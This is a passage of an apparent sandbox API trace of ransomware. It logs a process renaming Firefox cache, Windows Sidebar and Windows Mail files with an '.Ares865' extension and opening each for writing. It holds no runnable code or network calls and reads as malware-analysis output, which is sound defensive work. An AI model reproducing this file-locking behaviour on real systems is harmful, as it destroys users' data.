Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.671] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=132419) returned 1 [0097.692] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" [0097.692] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" [0097.692] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" [0097.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.Ares865") returned 114 [0097.693] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.ares865"), dwFlags=0x1) returned 1 [0097.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42507) returned 1 [0097.702] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" [0097.702] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.Ares865") returned 114 [0097.702] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.ares865"), dwFlags=0x1) returned 1 [0097.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.704] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43525) returned 1 [0097.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" [0097.709] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.Ares865") returned 114 [0097.710] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.ares865"), dwFlags=0x1) returned 1 [0097.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.714] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=132349) returned 1 [0097.725] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" [0097.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" [0097.726] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.Ares865") returned 114 [0097.726] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.ares865"), dwFlags=0x1) returned 1 [0097.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.728] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18584) returned 1 [0097.731] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" [0097.732] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.Ares865") returned 114 [0097.732] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.ares865"), dwFlags=0x1) returned 1 [0097.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.733] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46718) returned 1 [0097.738] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft Help") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft Help" [0097.738] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft" [0097.739] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar" [0097.739] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865") returned 91 [0097.739] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows sidebar\\settings.ini.ares865"), dwFlags=0x1) returned 1 [0097.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows sidebar\\settings.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84) returned 1 [0097.772] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0097.773] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media" [0097.773] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0" [0097.773] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865") returned 93 [0097.773] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd.ares865"), dwFlags=0x1) returned 1 [0097.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.dtd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=498) returned 1 [0097.780] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail" [0097.781] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865") returned 131 [0097.781] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0097.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1508) returned 1 [0097.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865") returned 131 [0097.785] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0097.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=672) returned 1 [0097.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865") returned 131 [0097.789] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0097.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1736) returned 1 [0097.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865") returned 83 [0097.795] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.chk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.chk.ares865"), dwFlags=0x1) returned 1 [0097.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.chk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0097.809] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865") returned 83 [0097.809] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.log.ares865"), dwFlags=0x1) returned 1 [0097.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0097.957] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865") returned 88 [0097.957] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb00001.log.ares865"), dwFlags=0x1) returned 1 [0097.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edb00001.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edb00001.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.960] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0098.086] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865") returned 91 [0098.086] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\windows mail\\edbres00001.jrs.ares865"), dwFlags=0x1) returned 1 [0098.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local 